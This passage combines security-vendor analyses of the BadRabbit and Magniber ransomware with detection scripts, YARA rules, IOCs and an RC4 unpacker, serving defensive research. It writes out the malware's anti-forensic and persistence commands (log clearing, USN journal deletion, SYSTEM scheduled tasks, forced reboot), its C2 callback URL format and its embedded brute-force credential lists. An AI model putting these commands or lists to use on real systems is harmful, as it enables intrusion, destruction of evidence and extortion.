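scheduled task creation, wevtutil clear-log, fsutil USN deletejournal) plus
the forced reboot, matched against process-creation command lines. The
record format (one command line per string) and the sample records are
constructed for this example from the commands documented in the post.
"""
import re
from typing import Dict, List

# Rule name -> pattern applied to a full command line (case-insensitive).
RULES = {
    # rundll32 loading a DLL export by ordinal, e.g. "infpub.dat,#1 15"
    "Rundll32 Ordinal Arg": re.compile(r"rundll32(\.exe)?\s+\S+,#\d+", re.I),
    # schtasks /Create ... /RU SYSTEM (the rhaegal and drogon tasks)
    "Scheduled Task Created": re.compile(r"schtasks(\.exe)?\s+/create\b.*/ru\s+system", re.I),
    # wevtutil cl <log>: event log clearing used as anti-forensics
    "Wevtutil Clear-log": re.compile(r"wevtutil(\.exe)?\s+cl\s+(setup|system|security|application)", re.I),
    # fsutil usn deletejournal: NTFS change journal wiping
    "Fsutil USN Deletejournal": re.compile(r"fsutil(\.exe)?\s+usn\s+deletejournal", re.I),
    # shutdown /r /t 0 /f: the drogon task forcing an immediate reboot
    "Forced Reboot": re.compile(r"shutdown(\.exe)?\s+/r\s+/t\s+0\s+/f", re.I),
}


def classify(command_line: str) -> List[str]:
    """Names of every rule matching one process-creation command line."""
    return [name for name, pattern in RULES.items() if pattern.search(command_line)]


def scan(records: List[str]) -> Dict[str, List[str]]:
    """Map each triggered rule name to the command lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for line in records:
        for name in classify(line):
            hits.setdefault(name, []).append(line)
    return hits


def badrabbit_score(records: List[str]) -> int:
    """Number of distinct rules triggered; several together point at the chain."""
    return len(scan(records))


def task_names(records: List[str]) -> List[str]:
    """Scheduled task names (/TN) from creation commands, in first-seen order."""
    names: List[str] = []
    for line in records:
        if "Scheduled Task Created" in classify(line):
            match = re.search(r"/tn\s+(\S+)", line, re.I)
            if match and match.group(1) not in names:
                names.append(match.group(1))
    return names


# Constructed sample records: the first four mirror BADRABBIT commands from
# the post (task path and -id value are placeholders); the last two are benign.
SAMPLE_RECORDS = [
    r"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15",
    r'C:\Windows\system32\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\dispci.exe -id 1234"',
    r'C:\Windows\system32\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:10:00',
    r"C:\Windows\system32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:",
    r"C:\Windows\system32\rundll32.exe shell32.dll,Control_RunDLL hotplug.dll",
    r"C:\Windows\system32\schtasks.exe /Query /TN rhaegal",
]

if __name__ == "__main__":
    for rule, lines in scan(SAMPLE_RECORDS).items():
        print(f"[{rule}] {len(lines)} hit(s)")
    print("score:", badrabbit_score(SAMPLE_RECORDS), "tasks:", task_names(SAMPLE_RECORDS))
```

A score of several distinct rules within a short window on one host is the signal worth alerting on; any single rule (notably the rundll32 one) fires on legitimate activity too.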

We would like to thank Edward Fjellskål for his assistance with
research for this blog.

Indicators

File: Install_flashPlayer.exe
Hash: FBBDC39AF1139AEBBA4DA004475E8839
Description: install_flashplayer.exe drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to
install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A
Description: 32- or 64-bit DiskCryptor driver

File: .tmp
Hash: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977
Description: 32- or 64-bit Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note
that “15” is the default value present in the malware and may be
altered by specifying a different value on the command line when executing install_flash_player.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "<%COMSPEC%> /C Start "" "" -id
Description: Creates the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%WINDIR%\system32\shutdown.exe /r /t 0 /f" /ST
Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System & wswevtutil cl Security & wswevtutil cl Application & fsutil usn deletejournal /D :
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run: "<%COMSPEC%> /C Start "" "" -id && exit"
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run: "%WINDIR%\system32\shutdown.exe /r /t 0 /f"
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
Admin
Guest
User
User1
user-1
Test
root
buh
boss
ftp
rdp
rdpuser
rdpadmin
manager
support
work
other user
operator
backup
asus
ftpuser
ftpadmin
nas
nasuser
nasadmin
superuser
netguest
alex

Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
administrator
Guest
guest
User
user
Admin
admin
Test
test
root
123
1234
12345
123456
1234567
12345678
123456789
1234567890
Administrator123
administrator123
Guest123
guest123
User123
user123
Admin123
admin123
Test123
test123
password
111111
55555
77777
777
qwe
qwe123
qwe321
qwer
qwert
qwerty
qwerty123
zxc
zxc123
zxc321
zxcv
uiop
123321
321
love
secret
sex
god

Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
atsvc
browser
eventlog
lsarpc
netlogon
ntsvcs
spoolss
samr
srvsvc
scerpc
svcctl
wkssvc

Yara Rules

rule FE_Hunting_BADRABBIT
{
    meta:
        version = ".2"
        filetype = "PE"
        author = "ian.ahl @TekDefense & nicholas.carr @itsreallynick"
        date = "2017-10-24"
        md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
    strings:
        // Messages
        $msg1 = "Incorrect password" nocase ascii wide
        $msg2 = "Oops! Your files have been encrypted." ascii wide
        $msg3 = "If you see this text, your files are no longer accessible." ascii wide
        $msg4 = "You might have been looking for a way to recover your files." ascii wide
        $msg5 = "Don't waste your time. No one will be able to recover them without our" ascii wide
        $msg6 = "Visit our web service at" ascii wide
        $msg7 = "Your personal installation key#1:" ascii wide
        $msg8 = "Run DECRYPT app at your desktop after system boot" ascii wide
        $msg9 = "Password#1" nocase ascii wide
        $msg10 = "caforssztxqzf2nm.onion" nocase ascii wide
        $msg11 = /partition (unbootable|not (found|mounted))/ nocase ascii wide

        // File references
        $fref1 = "C:\\Windows\\cscc.dat" nocase ascii wide
        $fref2 = "\\\\.\\dcrypt" nocase ascii wide
        $fref3 = "Readme.txt" ascii wide
        $fref4 = "\\Desktop\\DECRYPT.lnk" nocase ascii wide
        $fref5 = "dispci.exe" nocase ascii wide
        $fref6 = "C:\\Windows\\infpub.dat" nocase ascii wide

        // META
        $meta1 = "http://diskcryptor.net/" nocase ascii wide
        $meta2 = "dispci.exe" nocase ascii wide
        $meta3 = "GrayWorm" ascii wide
        $meta4 = "viserion" nocase ascii wide

        // Commands
        $com1 = "ComSpec" ascii wide
        $com2 = "\\cmd.exe" nocase ascii wide
        $com3 = "schtasks /Create" nocase ascii wide
        $com4 = "schtasks /Delete /F /TN %ws" nocase ascii wide
    condition:
        (uint16(0) == 0x5A4D)
        and
        (8 of ($msg*) and 3 of ($fref*) and 2 of ($com*))
        or
        (all of ($meta*) and 8 of ($msg*))
}

rule FE_Trojan_BADRABBIT_DROPPER
{
    meta:
        author = "muhammad.umair"
        md5 = "fbbdc39af1139aebba4da004475e8839"
        rev = 1
    strings:
        $api1 = "GetSystemDirectoryW" fullword
        $api2 = "GetModuleFileNameW" fullword
        $dropped_dll = "infpub.dat" ascii fullword wide
        $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
        $extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D 8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

rule FE_Worm_BADRABBIT
{
    meta:
        author = "muhammad.umair"
        md5 = "1d724f95c61f1055f0d02c2154bbccd3"
        rev = 1
    strings:
        $api1 = "WNetAddConnection2W" fullword
        $api2 = "CredEnumerateW" fullword
        $api3 = "DuplicateTokenEx" fullword
        $api4 = "GetIpNetTable"
        $del_tasks = "schtasks /Delete /F /TN drogon" ascii fullword wide
        $dropped_driver = "cscc.dat" ascii fullword wide
        $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
        $iter_encrypt = { 8D 44 24 3C 50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66 3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ?? }
        $share_fmt_str = "\\\\%ws\\admin$\\%ws" ascii fullword wide
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

rule FE_Trojan_BADRABBIT_MIMIKATZ
{
    meta:
        author = "muhammad.umair"
        md5 = "37945c44a897aa42a66adcab68f560e0"
        rev = 1
    strings:
        $api1 = "WriteProcessMemory" fullword
        $api2 = "SetSecurityDescriptorDacl" fullword
        $api_str1 = "BCryptDecrypt" ascii fullword wide
        $mimi_str = "CredentialKeys" ascii fullword wide
        $wait_pipe_seq = { FF 15 ?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24 1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 75 3B }
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

rule FE_Trojan_BADRABBIT_DISKENCRYPTOR
{
    meta:
        author = "muhammad.umair"
        md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
        rev = 1
    strings:
        $api1 = "CryptAcquireContextW" fullword
        $api2 = "CryptEncrypt" fullword
        $api3 = "NetWkstaGetInfo" fullword
        $decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8 00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8 56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F }
        $msg1 = "Disk decryption progress..." ascii fullword wide
        $task_fmt_str = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" ascii fullword wide
        $tok1 = "\\\\.\\dcrypt" ascii fullword wide
        $tok2 = "C:\\Windows\\cscc.dat" ascii fullword wide
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 150KB and all of them
}

Author: Barry Vengerik

BadRabbit: a closer look at the new version of Petya/NotPetya

Petya/NotPetya (aka EternalPetya) made headlines in June, attacking users around the world. Today, we noted an outbreak of similar-looking malware, called BadRabbit, probably prepared by the same authors. Just like the previous edition, BadRabbit has an infector allowing for lateral movement, using SMB to propagate with a hardcoded list of usernames and passwords. However, unlike NotPetya, it doesn’t use EternalBlue and is more widely spread (impacted countries include Ukraine, Russia, Turkey, and Bulgaria).

Another key difference between Petya/NotPetya and BadRabbit is that the initial vector is different (a website dropping a fake Flash update). Also, some of its components have been replaced. The malware package is complex, and we will likely dedicate future articles to describing all its features. But let’s have an initial look.

Analyzed samples

Behavioral analysis

The dropper is an executable that pretends to be a Flash update. The malware must run with Administrator privileges, but no UAC bypass technique has been deployed; it relies purely on social engineering, trying to convince the user to elevate it. After being run, it drops and deploys the main module in the C:\Windows directory. This time, it is named infpub.dat. (We can see the analogy to the previous NotPetya outbreak, where the DLL was named perfc.dat):

It is run by the rundll32.exe called with parameters:

"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15"

Notice that the malware scans computers in the LAN:

Our guess is that the information about the detected machines is used for lateral movements.

The malware also drops other elements in the Windows directory: cscc.dat and dispci.exe

The malware encrypts files with the selected extensions. All the files are encrypted with the same key (the same plaintext gives the same ciphertext).

Below, we demonstrate a visualization of a sample BMP file before and after being encrypted by BadRabbit:

It does not change file extensions. The marker indicating that the file has been encrypted is appended to the end of the file content; it is the Unicode text “%encrypted”:

Here’s the dropped ransom note. As before, it’s in TXT format, named Readme.txt:

As NotPetya did before, BadRabbit adds a scheduled task for the system reboot:

After the attack is completed, the system is restarted and the bootlocker screen pops up:

We can clearly see the similarity with the screen that was displayed by Petya/NotPetya:

However, this time there is no fake CHKDSK known from each of the Petya editions.

Following the ransom notes, we see that there are two encryption keys that the victim must get in order to be able to recover the files. The first one is the key to the bootlocker. After unlocking the first stage, the second key is required to unlock the files.

Website for the victim

Last time, the authors of the attack tried to use a single email account to communicate with the victims. Of course, this was unreliable, as they soon lost access to the account. This time, like most ransomware authors, they created a Tor-based webpage. The authors invested more effort in the user experience, and the website contains visual effects, including a ransom note that slowly emerges from colorful, animated text:

After pasting the key from the ransom note, the victim is given an individual bitcoin address:

They also provide a box that can be used for reporting problems.

Inside

This malware has multiple elements. Execution starts in the PE file that is responsible for dropping and installing other elements.

The first component, infpub.dat, is analogous to the perfc.dat known from the NotPetya attack. This time, the DLL exports two functions:

The function at ordinal #1 is deployed first by the main dropper:

This DLL contains an infector that spreads the malware to other machines in the LAN. Among other methods, we see WMIC being used to deploy the modules dropped on remote machines. The responsible code looks similar to the analogous elements of Petya/NotPetya:

This time, in addition to the credentials dumped with the help of the Mimikatz-based module, the sample tries to perform a dictionary attack and “guess” some of the passwords for remote logins. The list consists of commonly used passwords:

The same DLL is also responsible for infecting files one by one. Encryption is performed with the help of Windows Crypto API:

Some of the system directories are exempted from the attack:

\Windows
\Program Files
\ProgramData
\AppData

Their list of the attacked extensions looks like an extended version of the list used by Petya/NotPetya:

3ds 7z accdb ai asm asp aspx avhd back bak bmp brw c cab
cc cer cfg conf cpp crt cs ctl cxx dbf der dib disk djvu
doc docx dwg eml fdb gz h hdd hpp hxx iso java jfif jpe
jpeg jpg js kdbx key mail mdb msg nrg odc odf odg odi odm
odp ods odt ora ost ova ovf p12 p7b p7c pdf pem pfx php
pmf png ppt pptx ps1 pst pvi py pyc pyw qcow qcow2 rar rb
rtf scm sln sql tar tib tif tiff vb vbox vbs vcb vdi vfd
vhd vhdx vmc vmdk vmsd vmtm vmx vsdx vsv work xls xlsx
xml xvd zip
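Because BadRabbit leaves file extensions unchanged, the trailing “%encrypted” marker described earlier and the extension list above are what an incident responder has to work with when sizing up the damage on a host. The following triage helper is an added example, not code from the Malwarebytes post; it reads “Unicode” as UTF-16LE (an assumption, with a UTF-8 fallback) and builds its sample files inline.

```python
"""Triage for files encrypted by BadRabbit, based on the marker described above.

Added example; this is not code from the Malwarebytes post. Encrypted files keep
their extension, so the only file-level sign is the "%encrypted" text appended to
the content. "Unicode" is read here as UTF-16LE (assumption), with a UTF-8
fallback; the targeted-extension list is the one quoted in the post. The sample
files built by demo_scan() are constructed for this example.
"""
import os
import tempfile
from typing import List, Optional

MARKER_TEXT = "%encrypted"
# Checked in this order; the name of the first matching encoding is returned.
MARKERS = {
    "utf-16le": MARKER_TEXT.encode("utf-16le"),
    "utf-8": MARKER_TEXT.encode("utf-8"),
}

# Extensions targeted by the encrypting DLL (lower-case, no leading dot).
TARGET_EXTENSIONS = set("""
3ds 7z accdb ai asm asp aspx avhd back bak bmp brw c cab cc cer cfg conf cpp
crt cs ctl cxx dbf der dib disk djvu doc docx dwg eml fdb gz h hdd hpp hxx iso
java jfif jpe jpeg jpg js kdbx key mail mdb msg nrg odc odf odg odi odm odp ods
odt ora ost ova ovf p12 p7b p7c pdf pem pfx php pmf png ppt pptx ps1 pst pvi py
pyc pyw qcow qcow2 rar rb rtf scm sln sql tar tib tif tiff vb vbox vbs vcb vdi
vfd vhd vhdx vmc vmdk vmsd vmtm vmx vsdx vsv work xls xlsx xml xvd zip
""".split())


def marker_encoding(data: bytes) -> Optional[str]:
    """Encoding of the trailing "%encrypted" marker, or None if it is absent."""
    for name, marker in MARKERS.items():
        if data.endswith(marker):
            return name
    return None


def is_targeted(path: str) -> bool:
    """True if the file's extension is on BadRabbit's encryption list."""
    ext = os.path.splitext(path)[1].lstrip(".").lower()
    return ext in TARGET_EXTENSIONS


def scan_tree(root: str, tail: int = 64) -> List[str]:
    """Paths under root whose last bytes carry the marker (only the tail is read)."""
    hits: List[str] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    fh.seek(0, os.SEEK_END)
                    fh.seek(max(0, fh.tell() - tail))
                    if marker_encoding(fh.read()) is not None:
                        hits.append(path)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
    return sorted(hits)


def demo_scan() -> List[str]:
    """Build a small constructed tree and return the base names flagged in it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "photo.bmp": b"BM" + b"\x00" * 40 + MARKERS["utf-16le"],  # encrypted
            "report.docx": b"PK\x03\x04" + b"\x00" * 40,              # targeted, intact
            "Readme.txt": b"Oops! Your files have been encrypted.",    # ransom note
        }
        for name, content in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(content)
        return [os.path.basename(p) for p in scan_tree(root)]


if __name__ == "__main__":
    print("flagged:", demo_scan())
```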

The AES key is generated with the cryptographically secure function CryptGenRandom.

Then it is passed to the encrypting routine, along with other parameters, such as a hardcoded public key (used later to protect the random key and preserve it in a form that can be decrypted only by the attackers).

This module drops and installs other modules used to carry out the later stages of the attack. One of them is a legitimate disk encryption driver, DiskCryptor (cscc.dat). It is dropped and installed as a service:

The random key is later passed to another application that is dropped by this module, dispci.exe. That element is responsible for carrying out the disk encryption.

That module receives the randomly generated key in the -id parameter:

So the random AES key is kept for some time in unencrypted form, as part of a command line waiting to be executed.

dispci.exe

This module communicates with the dropped driver using the appropriate IOCTLs. The dropped driver is a legitimate module used for disk encryption; dispci.exe is made to adopt the driver’s features for malicious purposes. Example:

In its resources, we can find the low-level components that are installed directly to the disk (analogously to the Petya kernel installed by the previous version). The first resource is a bootloader, and the other two are analogous variants of the malicious kernel:

The low-level components: bootloader and kernel

This time the low-level part looks different from the one in NotPetya. Fragment of the bootloader:

It seems that the authors decided to write their own kernel rather than using the one from Petya. It is also installed in a different position on the disk: at the end rather than at the beginning, where Petya put it. The kernel is encrypted using a simple routine:

Conclusion

The code has many overlapping and analogous elements to the code of Petya/NotPetya, which suggests that the authors behind the attack are the same. Again, they tried to compose their malicious bundle out of stolen elements; however, the stolen Petya kernel has been substituted with a more advanced disk encryptor in the form of a legitimate driver. It looks like the authors tried to improve upon previous mistakes and finish unfinished business. So far, it seems that in the current release, encrypted data is recoverable after buying the key, which means the BadRabbit attack is not as destructive as the previous one. However, the malware is complex and its detailed analysis will take more time. We will be updating this article with the latest findings.

Users of Malwarebytes for Windows are protected from BadRabbit. It is detected as Ransom.BadRabbit.

Summary about the previous attack, Petya/NotPetya:


This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going into the details of malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

The post BadRabbit: a closer look at the new version of Petya/NotPetya appeared first on Malwarebytes Labs.

Author: Malwarebytes Labs

Magniber Ransomware Wants to Infect Only the Right People

Introduction

Exploit kit (EK) use has been on the decline since late 2016;
however, certain activity remains consistent. The Magnitude Exploit
Kit is one such example that continues to affect users, particularly
in the APAC region.

In Figure 1, which is based on FireEye Dynamic Threat Intelligence
(DTI) reports shared in March 2017, we can see the regions affected by
Magnitude EK activity during the last three months of 2016 and the
first three months of 2017.


Figure 1: Magnitude EK distribution as
seen in March 2017

This trend continued until late September 2017, when we saw
Magnitude EK focus primarily on the APAC region, with a large chunk
targeting South Korea. Magnitude EK activity then fell off the radar
until Oct. 15, 2017, when it came back and began focusing solely on
South Korea. Previously it had been distributing Cerber ransomware,
but Cerber distribution has declined (we have also seen a decline of
Cerber being distributed via email) and now it is distributing
ransomware known as Magniber.

Infection

The first reappearance of Magnitude EK on Oct. 15 came as a
malvertising redirection from the domain: fastprofit[.]loan. The
infection chain is shown in Figure 2.


Figure 2: Infection chain

The Magnitude EK landing page exploited CVE-2016-0189, which FireEye
first reported as being used in Neutrino Exploit Kit after it was
patched. Figure 3 shows the landing page and CVE usage.


Figure 3: Magnitude EK landing page

As seen previously with Magnitude EK, the payload is downloaded as a
plain EXE (see Figure 4), and the domain infrastructure is hosted on a
server that identifies itself as:

“Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6”


Figure 4: Magnitude payload header and
plain MZ response

Payload

In the initial report published by our colleagues at Trend Micro, the
ransomware being distributed is referred to as Magniber. These
ransomware payloads only seem to target Korean systems, since they
will not execute if the system language is not Korean.

Magniber encrypts user data using AES128. The sample used for this
analysis (dc2a2b84da359881b9df1ec31d03c715) was pulled from our DTI
system when the campaign was active. Of note, this sample differs from
the hash shared publicly by Trend Micro, but the two exhibit the same
behavior, share the infection vector, and were distributed around the
same time.

The malware contains a binary payload in its resource section
encrypted in reverse using RC4: it unpacks the buffer starting from
its end and working back to its start. Reverse RC4 decryption keys are
30 bytes long and also contain non-ASCII characters. They are as
follows:

  • dc2a2b84da359881b9df1ec31d03c715 RC4 key:
    { 0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0,
      0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04,
      0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }

The malware calls GetSystemDefaultUILanguage, and if the
system language is not Korean, it exits (instructions can be seen in
Figure 5). After unpacking in memory, the malware starts executing the
unpacked payload.


Figure 5: Language check targeted at Korea

A mutex with name “ihsdj” is created to prevent multiple
executions. The payload then generates a pseudorandom 19-character
string based on the CPU clock from multiple GetTickCount calls.
The string is then used to create a file in the user’s %TEMP%
directory (e.g. “xxxxxxxxxxxxxxxxxxx.ihsdj”), which contains
the IV (Initialization Vector) for the AES128 encryption and a copy of
the malware itself with the name “ihsdj.exe”.

Next, the malware constructs 4 URLs for callback. It uses the
19-character long pseudorandom string it generated, and the following
domains to create the URLs:

  • bankme.date
  • jobsnot.services
  • carefit.agency
  • hotdisk.world

In order to evade sandbox systems, the malware checks whether it is
running inside a VM and appends the result to the callback URL. It
does this by executing CPUID instructions (shown in Figure 6)
sandwiched between RDTSC reads; CPUID forces a VM exit under a
hypervisor, which lengthens the measured interval.


Figure 6: CPUID instruction to detect VM presence

The aforementioned VM check is repeated multiple times to obtain the
average execution time of CPUID; if the average is greater than 1000,
the system is considered a VM. If the check concludes the system is a
VM, a “1” is appended to the end of the URL (see Figure 7);
otherwise, a “0” is appended. The format of the URL is as follows:

  • http://[19-character pseudorandom string].[callback domain]/new[0 or 1]

Examples of this would be:

  • http://7o12813k90oggw10277.bankme[.]date/new1
  • http://4bg8l9095z0287fm1j5.bankme[.]date/new0


Figure 7: Command and control communication

If the malware is executed a second time after encryption, the
callback URL ends in “end0” or “end1” instead of
“new”. An example of this would be:

  • hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1

The malware then starts to encrypt user files on the system,
renaming them by adding a “.ihsdj” extension to the end. The
public key for the AES128 and IV for the sample analyzed are:

  • IV: EP866p5M93wDS513
  • Public Key AES128: S25943n9Gt099y4K

A text file “READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt”
is created in the user’s %TEMP% directory and shown to the user. The
ransom message is shown in Figure 8.


Figure 8: Ransom message for the infected user

The malware also adds two scheduled tasks: one runs its copy from
%TEMP% through the Program Compatibility Assistant launcher
(pcalua.exe), and the other re-opens the ransom note for the user.
The commands are as follows (the backslashes in the %TEMP% paths were
lost in extraction and are restored here):

  • schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR "pcalua.exe -a %TEMP%\ihsdj.exe"
  • schtasks /create /SC MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR %TEMP%\READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt

The malware then issues a command to delete itself after exiting,
using a local ping as a delay before the deletion:

  • cmd /c ping localhost -n 3 > nul & del C:\PATH\MALWARE.EXE

Figure 9 contains the Python code for unpacking the malware payload,
which is encrypted using RC4 in reverse.


Figure 9: Python script for unpacking
malware payload
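As an added illustration of the unpacking step (this is not the script shown in Figure 9), the following Python reimplements the reverse-RC4 scheme described above with the 30-byte key listed for the sample. It assumes that "in reverse" means the keystream is consumed walking the buffer from its last byte to its first and that the recovered payload is returned in natural order; the MZ check is a sanity check added here, not something the report attributes to the malware.

```python
"""Reverse-RC4 unpacker for the resource payload described in the report.

Assumption (not stated in the report): the RC4 keystream is applied
walking the buffer from its last byte to its first, and the plaintext is
returned in natural byte order. RC4_KEY is the key listed in the report.
"""
import sys

# 30-byte RC4 key from the report (sample dc2a2b84da359881b9df1ec31d03c715)
RC4_KEY = bytes([
    0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06,
    0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83,
    0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f,
])


def rc4(data: bytes, key: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xff
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xff
        j = (j + s[i]) & 0xff
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xff])
    return bytes(out)


def reverse_rc4(data: bytes, key: bytes) -> bytes:
    """RC4 applied from the end of the buffer toward its start (assumed scheme)."""
    return rc4(data[::-1], key)[::-1]


def unpack_payload(blob: bytes, key: bytes = RC4_KEY) -> bytes:
    """Decrypt an extracted resource blob and sanity-check for a PE header."""
    payload = reverse_rc4(blob, key)
    if payload[:2] != b"MZ":
        raise ValueError("decrypted data does not start with MZ: wrong key or scheme")
    return payload


if __name__ == "__main__":
    # Usage: python unpack.py <resource.bin> <payload.exe>
    with open(sys.argv[1], "rb") as f_in, open(sys.argv[2], "wb") as f_out:
        f_out.write(unpack_payload(f_in.read()))
```

Feed it the raw resource blob extracted from the sample (for example with a PE resource dumper); if the MZ check fails, the byte-order assumption or the key is wrong for that sample.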

Conclusion

Ransomware is a significant threat to enterprises. While the current
threat landscape suggests a large portion of attacks are coming from
emails, exploit kits continue to put users at risk – especially those
running old software versions and not using ad blockers. Enterprises
need to make sure their network nodes are fully patched.

IOCs

Malware Sample Hash
  • dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)
Malvertiser Domains
  • fastprofit[.]loan
  • fastprofit[.]me
EK Domain Examples
  • 3e37i982wb90j.fileice[.]services
  • a3co5a8iab2x24g90.helpraw[.]schule
  • 2i1f3aadm8k.putback[.]space
Command and Control Domains
  • 3ee9fuop6ta4d6d60bt.bankme.date
  • 3ee9fuop6ta4d6d60bt.jobsnot.services
  • 3ee9fuop6ta4d6d60bt.carefit.agency
  • 3ee9fuop6ta4d6d60bt.hotdisk.world

Author: Muhammad Umair